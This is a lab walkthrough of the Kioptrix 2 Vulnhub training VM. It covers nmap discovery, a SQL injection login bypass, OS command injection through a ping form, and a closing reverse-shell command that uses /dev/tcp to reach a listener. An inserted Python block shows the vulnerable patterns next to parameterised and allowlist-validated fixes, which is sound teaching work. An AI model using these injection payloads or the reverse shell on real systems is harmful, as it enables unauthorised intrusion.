Kioptrix 2 Walkthrough (Vulnhub)

2020/09/01 22:35 · Kioptrix · Original article

Introduction

KIOPTRIX VM IMAGE CHALLENGES:
This Kioptrix VM image is an easy challenge. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques of vulnerability assessment and exploitation. There is more than one way to successfully complete the challenges.
Source: http://www.kioptrix.com/blog/?page_id=135
Source: http://www.kioptrix.com/blog/?p=49
This is the second release of #2. The first release had a bug in the web application.
9 Feb 2012: re-released
11 Feb 2011: original release

Environment setup

Go to https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ and download the VM image.

3. Hands-on penetration

Scan the target subnet with nmap to find hosts:

xiaoze@bad:~$ nmap 192.168.2.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 03:15 CST
Nmap scan report for RM2100.lan (192.168.2.1)
Host is up (0.0037s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
1080/tcp open  socks

Nmap scan report for chuangmi-plug-v3_miap5EDA.lan (192.168.2.100)
Host is up (0.014s latency).
All 1000 scanned ports on chuangmi-plug-v3_miap5EDA.lan (192.168.2.100) are closed

Nmap scan report for lumi-acpartner-mcn02_miap9740.lan (192.168.2.108)
Host is up (0.0078s latency).
All 1000 scanned ports on lumi-acpartner-mcn02_miap9740.lan (192.168.2.108) are closed

Nmap scan report for MiAiSoundbox.lan (192.168.2.117)
Host is up (0.0036s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
9999/tcp open  abyss

Nmap scan report for zedeMacBook-Pro.lan (192.168.2.120)
Host is up (0.30s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for bad.lan (192.168.2.133)
Host is up (0.00027s latency).
All 1000 scanned ports on bad.lan (192.168.2.133) are closed

Nmap scan report for lumi-gateway-v3_miio87687718.lan (192.168.2.153)
Host is up (0.0095s latency).
All 1000 scanned ports on lumi-gateway-v3_miio87687718.lan (192.168.2.153) are closed

Nmap scan report for 192.168.2.161
Host is up (0.0028s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql

Nmap scan report for MIX2S-ouyangxiaozede.lan (192.168.2.235)
Host is up (0.0060s latency).
All 1000 scanned ports on MIX2S-ouyangxiaozede.lan (192.168.2.235) are closed

Nmap done: 256 IP addresses (9 hosts up) scanned in 18.32 seconds

The target host is identified as 192.168.2.161. Run a service and OS detection scan against it:

xiaoze@bad:~$ sudo nmap -sS -sV -O  192.168.2.161
[sudo] xiaoze 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 03:20 CST
Nmap scan report for 192.168.2.161
Host is up (0.00086s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
631/tcp  open  ipp        CUPS 1.1
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 00:0C:29:E1:BD:4F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.10 seconds

Port 80 is open and serving a web application. As a web-app guy, the web app is the way into the box: visit http://192.168.2.161, and after loading it looks like this:

The weak credential pair admin:admin fails with a wrong-password error, but the classic SQL injection login bypass admin' or 1=1 -- - logs in successfully.

Entering baidu.com;ls -la into the input box shows that the appended ls -la command is executed, so the ping form is vulnerable to OS command injection.
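The two input-handling defects exploited above, the string-built login query and the ping form that hands its input to a shell, shown next to hardened versions that reject exactly these payloads. This is an added example, not code from the Kioptrix 2 VM or from the original post; the users table and password are constructed sample data, and the function names are my own.

```python
import re
import sqlite3

# Payloads taken from the walkthrough above.
SQLI_PAYLOAD = "admin' or 1=1 -- -"   # login bypass
CMDI_PAYLOAD = "baidu.com;ls -la"      # command injection via the ping form

# Allowlist: a DNS hostname (labels of letters, digits, inner hyphens) or a dotted-quad IPv4.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOST_RE = re.compile(r"^(?:%s\.)*%s$" % (_LABEL, _LABEL))
_IPV4_RE = re.compile(r"^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$")

def is_valid_ping_target(target: str) -> bool:
    """Allowlist check for the ping form input. Shell metacharacters such as
    ';', '|', '&', '`' and '$' are rejected simply because they are not in the allowlist."""
    if len(target) > 253:
        return False
    if _IPV4_RE.match(target):
        return all(0 <= int(octet) <= 255 for octet in target.split("."))
    return bool(_HOST_RE.match(target))

def build_ping_argv(target: str) -> list:
    """Build the ping command as an argv list for subprocess.run (no shell involved),
    so a second command can never be spliced in even if validation were bypassed."""
    if not is_valid_ping_target(target):
        raise ValueError("rejected ping target: %r" % target)
    return ["ping", "-c", "3", target]

def _demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the box's MySQL users table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def login_unsafe(db: sqlite3.Connection, username: str, password: str) -> bool:
    """The vulnerable pattern: user input pasted straight into the SQL text.
    With SQLI_PAYLOAD as username, 'or 1=1' is true and '-- ' comments out the password check."""
    query = "SELECT 1 FROM users WHERE username='%s' AND password='%s'" % (username, password)
    return db.execute(query).fetchone() is not None

def login_safe(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened form: a parameterised query, so the input is data and never SQL."""
    query = "SELECT 1 FROM users WHERE username=? AND password=?"
    return db.execute(query, (username, password)).fetchone() is not None
```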

Use this command injection to get a reverse shell back to an nc listener:

127.0.0.1; bash -i >& /dev/tcp/192.168.2.133/8877 0>&1